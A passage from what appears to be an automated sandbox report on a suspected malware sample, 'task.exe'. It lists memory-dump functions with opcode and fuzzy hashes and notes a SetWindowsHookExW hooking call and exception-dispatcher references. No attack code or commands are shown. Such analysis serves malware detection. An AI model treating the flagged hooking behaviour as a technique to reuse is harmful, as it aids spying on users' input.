Opcode Fuzzy Hash: 2f37768c00c6d687cccf586fbc61a0efa3c6b011033704e2bc0f2b5e83c47c3b
Instruction Fuzzy Hash: 09F068719042409AE7108A15DC84B62FF98DF51724F28C46AED085B686C379AC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05270108, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d308eb144c7455a9961054c5da66ba0e0aad5fc510ffb460880ef94057bec91e
Instruction ID: 2360206c7fcab93efe0cfeb581e71d6c10cac1f8d960929217ff2ea8446a0dc0
Opcode Fuzzy Hash: d308eb144c7455a9961054c5da66ba0e0aad5fc510ffb460880ef94057bec91e
Instruction Fuzzy Hash: 4AE03970E55208EFCB40DFA4E94C5AEBBF5AB49301F1081A98809A3351D7301A04CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05270150, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25d2b50209358fb22727ddde45f4a3c8e3c2aab25f4046e694666f495c02afc
Instruction ID: a7dc6de562595e10fc23a8e39af368a195bda39c1e830a9e28615741c9f58bde
Opcode Fuzzy Hash: c25d2b50209358fb22727ddde45f4a3c8e3c2aab25f4046e694666f495c02afc
Instruction Fuzzy Hash: B9F01530D6A248EFCB54CFA4E58D6DDBBB0AB49315F1082AED84893751D3311615CF81

Uniqueness

Uniqueness Score: -1.00%

Function 052716A8, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea955bbaa52c4aab7d4cf670adeff4c04414705e5075a54b72587aed9c983b7
Instruction ID: d331fedad3af53316e21a13f4fed050a96c1f6d346acdada09863f1b7aac6c83
Opcode Fuzzy Hash: 0ea955bbaa52c4aab7d4cf670adeff4c04414705e5075a54b72587aed9c983b7
Instruction Fuzzy Hash: 80F0F23490520CEBCB00DF94D9449ACBBB6EF48310F1480A9AC0857361C732AA21EB84

Uniqueness

Uniqueness Score: -1.00%

Function 052705F0, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47adcd7c1c1c26033ea71f22845c950abd0140f8535bb67e10e18ee9e8c80dcf
Instruction ID: 6bf4fb929a68fb85a0feb5135d721f38e1ac62ae78ef1fd9a8cb13dea245113e
Opcode Fuzzy Hash: 47adcd7c1c1c26033ea71f22845c950abd0140f8535bb67e10e18ee9e8c80dcf
Instruction Fuzzy Hash: F7E09270C6D2C89FC701CBA0EC5D5987F70AF47202F0040EAC4485B2A2D2300E05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05271818, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb5d0ad9b08d134a967d42714bf4ff8e08f1bcd0d9ac26d191c2e10ad54e5fe
Instruction ID: 293914368ca9ee725ecdb56a0b79ea6048cfb8f8ec04d4b9e2206a7435aea152
Opcode Fuzzy Hash: fbb5d0ad9b08d134a967d42714bf4ff8e08f1bcd0d9ac26d191c2e10ad54e5fe
Instruction Fuzzy Hash: F4E0E534D08208EBCB04DF94D5449ACFBB5AF48311F14C1AA984857342D6329A51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 05271868, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8264300abd5f3ba999ff990225237e52f322cb29c0444e951d9c8f84183b76a
Instruction ID: e225d69d567ebcd43243971a03e30845844f65525c35a79911bbeb0ac3f745de
Opcode Fuzzy Hash: b8264300abd5f3ba999ff990225237e52f322cb29c0444e951d9c8f84183b76a
Instruction Fuzzy Hash: C2E09A34D15108EBCB04DF98D5455ACF7B5EF48315F1081AD980957341D7315A51CB81

Uniqueness

Uniqueness Score: -1.00%

Function 052713B9, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920a7299f2e17fd64ffdaf84f2c9109c2aadee7cd1714b5223bd8eb4b54fa57a
Instruction ID: 2dcabbab63fd216ecd716e7218eae7d5715de46d0ecd2eded1261105c3349207
Opcode Fuzzy Hash: 920a7299f2e17fd64ffdaf84f2c9109c2aadee7cd1714b5223bd8eb4b54fa57a
Instruction Fuzzy Hash: 74E0757591522CDFDB64CFA0DC98BDDBBB1AB19304F2040999649AB291CA751AC4DF04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00251DE0, Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

$5., xrefs: 0025210F

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: $5.
API String ID: 0-3202545751
Opcode ID: 1e925438e26624eb95527992bc453aa8eced0899e467c19fb300faf99f859177
Instruction ID: 0cdc69191f3c6400e37bf12a00ef3f9b013269f7ff64c482ae5398f23ab947b8
Opcode Fuzzy Hash: 1e925438e26624eb95527992bc453aa8eced0899e467c19fb300faf99f859177
Instruction Fuzzy Hash: A3C12331A28652CFC700CF68CD457BABBB1EF06302F14806BD969DB292D378D968C759

Uniqueness

Uniqueness Score: -1.00%

Function 002561F8, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@2#l, xrefs: 00256405

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: @2#l
API String ID: 0-1729293517
Opcode ID: 3db4ff6fd418ebd0263553f98039e2fea330dc4ed24304032512677b5c7f1f89
Instruction ID: 8b84b0eec56a369474ed2ee7368e5f04cefc7c1d4085311af65d47ac4f6ef996
Opcode Fuzzy Hash: 3db4ff6fd418ebd0263553f98039e2fea330dc4ed24304032512677b5c7f1f89
Instruction Fuzzy Hash: A6519C30A446498FDB44EFB5E898B9EBBF3AB88304F11CA79D1049F364DB745916CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00256208, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2#l, xrefs: 00256405

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: @2#l
API String ID: 0-1729293517
Opcode ID: 9b77cdcfea052e101513aa737294c10ec5a098e115993067a31b0a3ab1c5318d
Instruction ID: a4956c6f54e269ff2a4d69284fca0eb86472a5e74cf05cc360c0e75bf3c6363a
Opcode Fuzzy Hash: 9b77cdcfea052e101513aa737294c10ec5a098e115993067a31b0a3ab1c5318d
Instruction Fuzzy Hash: A2519D30A406498FDB44EFB6E998B8EBBF3AB88304F11C679D1049F324EB745906CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00256448, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57053c922032d37eec7ca0ac273d4ac8f436383c54aaf91663975fd59f08fcf5
Instruction ID: 5e453156373b61f6d022edf894fd08fd688218dc90da1d02113c67515e838649
Opcode Fuzzy Hash: 57053c922032d37eec7ca0ac273d4ac8f436383c54aaf91663975fd59f08fcf5
Instruction Fuzzy Hash: BD4144B1E156588BEB1CCF6B8C4468DFAF3AFC8300F54C1BA990CAA225DB700586CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00256458, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decf3896d0df88e9f8c65a673fdf85ef27c7b7f0831dca684f8ac3fe80ce79cb
Instruction ID: a61abdfb90e267daa21deff5380af32ff48cd2517566cf5ace4529e413dcf4ee
Opcode Fuzzy Hash: decf3896d0df88e9f8c65a673fdf85ef27c7b7f0831dca684f8ac3fe80ce79cb
Instruction Fuzzy Hash: 924130B1E156588BEB5CCF6B8C4478EFAF7AFC8300F54C1BA890CAA215EB7005858F15

Uniqueness

Uniqueness Score: -1.00%

Function 05271404, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40d6b6831f4521ae051583620f722398e18300bf5874ce4036ac9f37034bc1a
Instruction ID: b9f71dce9cd008358e1939f9861a8cc751b07ccf015c4be5ed1455ed373d38a0
Opcode Fuzzy Hash: b40d6b6831f4521ae051583620f722398e18300bf5874ce4036ac9f37034bc1a
Instruction Fuzzy Hash: 37E01A34A2912DC7CB24CE58E8543F9B7BABF4A312F0025E2D54AA3140C7B089E4CE04

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: task.exe PID: 572 Parent PID: 2780 task.exeCOMMON

Executed Functions

Function 021F3BC7, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 622COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 021F4273

Strings

DR, xrefs: 021F3E48

Memory Dump Source

Source File: 0000000E.00000002.705700867.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: HookWindows
String ID: DR
API String ID: 2559412058-1353295910
Opcode ID: 9d5435f8ee1247ddbbb976c9f1a8ecc7afe5a8f8fb34047ce09bd4cd2c9143ed
Instruction ID: aa7122d7c7b949af0c67d20b519d037c74e1f2a0328e2a6d7b526a777cb8e213
Opcode Fuzzy Hash: 9d5435f8ee1247ddbbb976c9f1a8ecc7afe5a8f8fb34047ce09bd4cd2c9143ed
Instruction Fuzzy Hash: D722013078D3C45FD712872898517AA7FB59F82314F1980FBD2A9CB693DB29DC098762

Uniqueness

Uniqueness Score: -1.00%

Function 003A9D90, Relevance: 4.0, APIs: 2, Instructions: 976COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad3f3c0fd7f360d8a020d2fd64bf543547c47fd48828c76b7f569735459a44e
Instruction ID: 1b354746e1800f6347bfb27adddc298958f6239a6b01b678f73198ccbe42277d
Opcode Fuzzy Hash: bad3f3c0fd7f360d8a020d2fd64bf543547c47fd48828c76b7f569735459a44e
Instruction Fuzzy Hash: 7EA222B0A00228CFCB65EF60C85879DB7B6AF89305F5085EAD50AA7750DF34AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003A9DB1, Relevance: 3.6, APIs: 2, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ab2b3c9a025d758b6ec87078d2650ea9233f1eb57499be893782254bdc9576
Instruction ID: aa0dadc58539823e97662cd6c5c18065e99b39abb2b1302e37e21d3bb5229b34
Opcode Fuzzy Hash: a4ab2b3c9a025d758b6ec87078d2650ea9233f1eb57499be893782254bdc9576
Instruction Fuzzy Hash: A35212B0A00228CFCB65EF60C85869DB7B6FF49205F5089EAD50AA7750DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003A9DF6, Relevance: 3.6, APIs: 2, Instructions: 623COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c0b2540159595f29d42392bcce4527e2433f5ebfa5e8093257903e3b1668eb
Instruction ID: fcdb96c235434f80a178eeed2e3c0f00e35b4457383463fdada175d192b92a09
Opcode Fuzzy Hash: 16c0b2540159595f29d42392bcce4527e2433f5ebfa5e8093257903e3b1668eb
Instruction Fuzzy Hash: 145212B0A00228CFCB65EF60C85869DB7B6FF49205F5089EAD50AA7750DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003AA24A, Relevance: 3.5, APIs: 2, Instructions: 458COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 47f2d7156ffce25c4adb6063dce990ad198afb20b3d24b6f308014e35105fe4d
Instruction ID: 34e788e009ca32d71c54f46880de5bb1b734f4e75aa3c1b52cdfbec0bc2752d5
Opcode Fuzzy Hash: 47f2d7156ffce25c4adb6063dce990ad198afb20b3d24b6f308014e35105fe4d
Instruction Fuzzy Hash: 232203B4A00228CFCB66EF60C84469CB7B6FF49205F5089EAD50AA7750CF359E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA28F, Relevance: 3.5, APIs: 2, Instructions: 451COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 407b24d1978333127f68bcd3629615d0d7262b60b35b4cbf98f31e25e9403610
Instruction ID: ef533b65a167abc7765667ffe338fe64ad2f1e4edb92755805be93b406496e27
Opcode Fuzzy Hash: 407b24d1978333127f68bcd3629615d0d7262b60b35b4cbf98f31e25e9403610
Instruction Fuzzy Hash: 082203B4A00228CFCB66EF60C84469CB7B6FF49205F9089EAD509A7750CF359E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA2D4, Relevance: 3.4, APIs: 2, Instructions: 442COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d55fe57c3bc4c8cb3a9ce1aa8171a1cf932733ef027e8869845835b354ae790c
Instruction ID: ceae1c864a60eac39015b4d515e469e60cab7a1e4ac3106ac173568c7fc8fe6a
Opcode Fuzzy Hash: d55fe57c3bc4c8cb3a9ce1aa8171a1cf932733ef027e8869845835b354ae790c
Instruction Fuzzy Hash: 992204B4A00228CFCB66EF60C84469CB7B6FF49205F5089EAD50AA7750CF359E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA310, Relevance: 3.4, APIs: 2, Instructions: 437COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 82e1ef52add27e798fda0e31eafe3407f80bdab9857971994c6df46e5c1f5885
Instruction ID: 0c90209bde20cba39368224634ac139b4c5516795935d4ecece42dc00f64a7ee
Opcode Fuzzy Hash: 82e1ef52add27e798fda0e31eafe3407f80bdab9857971994c6df46e5c1f5885
Instruction Fuzzy Hash: B92203B4A00228CFCB66EF60C84469CB7B6FF49205F5089EAD50AA7750CF359E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA355, Relevance: 3.4, APIs: 2, Instructions: 430COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fbc85e10b7efa27b4724e70249fe601fe53c05a773d73812edf9b00c53d71d28
Instruction ID: a3fd8bf495589dc73114357777a34eb9b7a8d142a7e62c4fbc6355bbe241bbd8
Opcode Fuzzy Hash: fbc85e10b7efa27b4724e70249fe601fe53c05a773d73812edf9b00c53d71d28
Instruction Fuzzy Hash: 4C2203B4A00228CFCB66EF60C84469DB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA39A, Relevance: 3.4, APIs: 2, Instructions: 423COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 41fce79f67bd0f756e28b5c357d7665ba0dbe6cb6eac44b8952cd05d0bc33fd0
Instruction ID: 0980d405baef5ff16a15caa5f8c5f4d28f78d062adc9f07512bafac891fc4f1a
Opcode Fuzzy Hash: 41fce79f67bd0f756e28b5c357d7665ba0dbe6cb6eac44b8952cd05d0bc33fd0
Instruction Fuzzy Hash: B01213B4A00228CFCB66EF60C84469DB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA3DF, Relevance: 3.4, APIs: 2, Instructions: 414COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0ced89d60df7985c04480750a9dee30b4a6f5f97201661519eee35e59056539f
Instruction ID: 9f36cb93fbc7313ccab0519e0e19be4a030e22635de4374d76ae3b79e0959e26
Opcode Fuzzy Hash: 0ced89d60df7985c04480750a9dee30b4a6f5f97201661519eee35e59056539f
Instruction Fuzzy Hash: FA1212B4A00228CFCB66EF60C85469CB7B6FF49205F5088EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA41B, Relevance: 3.4, APIs: 2, Instructions: 407COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8e94fa8b2720cac9fba3a4ce0ae3b0a99546f7f6a7f45ee77cbff4706ebf4a23
Instruction ID: 81d783bb0af36cd5f0ccdc379f75251aa274b6192eef21fa4f8083e7fc38cd25
Opcode Fuzzy Hash: 8e94fa8b2720cac9fba3a4ce0ae3b0a99546f7f6a7f45ee77cbff4706ebf4a23
Instruction Fuzzy Hash: EF1202B4A00228CFCB66EF60C85469CB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA457, Relevance: 3.4, APIs: 2, Instructions: 402COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f6866fee297fd4e7b2ee9a843c7666f5b79e17049a6d984fa60ca5b668b9f5da
Instruction ID: ebefc033d208e3e105fff792394b6b0c402f62886faed2ab7d9862e35d4ab1e4
Opcode Fuzzy Hash: f6866fee297fd4e7b2ee9a843c7666f5b79e17049a6d984fa60ca5b668b9f5da
Instruction Fuzzy Hash: 0C1201B4A00228CFCB66EF60C85469CB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA49C, Relevance: 3.4, APIs: 2, Instructions: 395COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c02e147c5c14d16d8938d0ef1fce15fafcc7ab365ff8b90c3eab215f4f1c4c12
Instruction ID: 0b0e739af93d1fb9369676f30eaecdc232899ef7e773aee391a75d324a51e75c
Opcode Fuzzy Hash: c02e147c5c14d16d8938d0ef1fce15fafcc7ab365ff8b90c3eab215f4f1c4c12
Instruction Fuzzy Hash: AD1201B4A00228CFCB66EF60C85469CB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA4E1, Relevance: 3.4, APIs: 2, Instructions: 388COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 741125cafe0f00a14f41db3a638f28b332fb7afa57f73c0dc22a85b9413d7f9d
Instruction ID: 5e0807d1f1e40b89ad7257c94228569504a61cd23643af5634966b907158233e
Opcode Fuzzy Hash: 741125cafe0f00a14f41db3a638f28b332fb7afa57f73c0dc22a85b9413d7f9d
Instruction Fuzzy Hash: 6502F2B4A00228CFCB66EF60C85479CB7B6FF49205F5089EAD50AA7750CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA526, Relevance: 3.4, APIs: 2, Instructions: 381COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e274bcc5a0df419fdf47fb5f32784dd80aed730e80a9a6a2962e5cdd327dc705
Instruction ID: 50de3b49f33182bb9441a597dc98513db87f04cc7e36ed24aab319e7eb4aa9e4
Opcode Fuzzy Hash: e274bcc5a0df419fdf47fb5f32784dd80aed730e80a9a6a2962e5cdd327dc705
Instruction Fuzzy Hash: 3D0201B4A00228CFCB66EF60C85469CB7B6FF49205F5089EAD50AA7750CF349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA56B, Relevance: 3.4, APIs: 2, Instructions: 374COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f05c67c14befac5628027cf0136589e06e805f8cbd39fe88fc366b331e75788c
Instruction ID: f8957d11cce4bb0790d93500f0569d6c8387ba62bb45748872eb5d80e4c3c5ec
Opcode Fuzzy Hash: f05c67c14befac5628027cf0136589e06e805f8cbd39fe88fc366b331e75788c
Instruction Fuzzy Hash: 1D0202B4A00228CFCB66EF60C85479CB7B6FF49205F5089EAD50AA7750CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA5B0, Relevance: 3.4, APIs: 2, Instructions: 367COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 927eb2edeb2c507dc1699c28f5079352fe7718d98687fd1fa913d3f5a0f4a0e1
Instruction ID: 06f8a1fb803dd5855ae22fa35e37a9506984b495f915356ae644fbfc011001a8
Opcode Fuzzy Hash: 927eb2edeb2c507dc1699c28f5079352fe7718d98687fd1fa913d3f5a0f4a0e1
Instruction Fuzzy Hash: 820201B4A00228CFCB65EF60C85479CB7B6FF89205F5089EAD50AA7740CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA5F5, Relevance: 3.4, APIs: 2, Instructions: 360COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dce9d9de239ba514efccda14efaa8d01cc84201de237c6452f5c2f07ba5c1376
Instruction ID: a7d0b70c0705d4af825cea527645a073eb131450439883413c6df78420da6890
Opcode Fuzzy Hash: dce9d9de239ba514efccda14efaa8d01cc84201de237c6452f5c2f07ba5c1376
Instruction Fuzzy Hash: B50202B4A00228CFCB65EF60C85479DB7B6FF89205F5089EAD50AA7740CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA63A, Relevance: 3.4, APIs: 2, Instructions: 353COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a9301ae9fc16bce481a7d683d44d6ed0b8b9a0eb2b5dc90d9a2869d2286c3928
Instruction ID: 1f1f420d3f8316b806800fd7a2235c7adbeecf9c486f8617dde36dc89766c4f8
Opcode Fuzzy Hash: a9301ae9fc16bce481a7d683d44d6ed0b8b9a0eb2b5dc90d9a2869d2286c3928
Instruction Fuzzy Hash: B7F101B0A00228CFCB65EF60C85479DB7B6EF89205F5089EAD50AA7740CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA67F, Relevance: 3.3, APIs: 2, Instructions: 346COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fef451143a2cbad6adba0bdefb687d2875831a4dc6dabc7ce8b974fba245f9dc
Instruction ID: 1b4cd81e3369d9ece519a97704c9257e3bb87a3714622ec4d182254723bff583
Opcode Fuzzy Hash: fef451143a2cbad6adba0bdefb687d2875831a4dc6dabc7ce8b974fba245f9dc
Instruction Fuzzy Hash: D5F102B4A00228CFCB65EF60C85479DB7B6FF89205F5089EAD50AA7740CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA6C4, Relevance: 3.3, APIs: 2, Instructions: 337COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

Source File: 0000000E.00000002.704976394.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 15e85fec76ce09ffd496fd51bfd820cf8c0fd66ef6ac9b3c8f6df2e7dcd43de0
Instruction ID: 061f6c066f91d39b24a4aa5287ebb2aef4dd54345ed8e9a81b8c3da87d859938
Opcode Fuzzy Hash: 15e85fec76ce09ffd496fd51bfd820cf8c0fd66ef6ac9b3c8f6df2e7dcd43de0
Instruction Fuzzy Hash: BCF1F2B4A00228CFCB65EF60C85479DB7B6EF89205F5089AAD50AA7740CB349E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003AA700, Relevance: 3.3, APIs: 2, Instructions: 332COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003AABF6
KiUserExceptionDispatcher.NTDLL ref: 003AACCE

Memory Dump Source

